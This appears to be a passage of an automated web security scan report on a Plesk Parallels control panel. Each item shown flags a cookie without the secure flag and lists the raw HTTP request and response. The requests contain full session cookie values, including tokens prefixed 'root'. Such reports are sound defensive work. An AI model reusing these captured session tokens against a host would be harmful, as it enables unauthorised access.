<meta content="b72
...[SNIP]...

4.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:23 GMT
Server: sw-cp-server
Content-Length: 25816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:24 GMT
Server: sw-cp-server
Content-Length: 11602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:32:03 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:32:03 GMT
Server: sw-cp-server
Content-Length: 11595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:31:27 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:27 GMT
Server: sw-cp-server
Content-Length: 11607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:57 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 15:55:58 GMT
Server: sw-cp-server
Content-Length: 11535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="071
...[SNIP]...

4.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/upload/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/upload/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:36 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:36 GMT
Server: sw-cp-server
Content-Length: 7624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/schedule/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:46 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:46 GMT
Server: sw-cp-server
Content-Length: 13485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/task@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/task@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:24 GMT
Server: sw-cp-server
Content-Length: 12815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

4.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/client@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/client@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:13 GMT
Server: sw-cp-server
Content-Length: 16453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/custom-buttons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:54:59 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 15:54:59 GMT
Server: sw-cp-server
Content-Length: 10916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

4.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/custom-button@new/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/custom-buttons/custom-button@new/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 405 Method Not Allowed
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:12:29 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=customers; path=/
Content-Length: 0
Date: Sat, 24 Sep 2011 16:12:29 GMT
Server: sw-cp-server


4.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/ftp-sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/ftp-sessions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/ftp-sessions/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
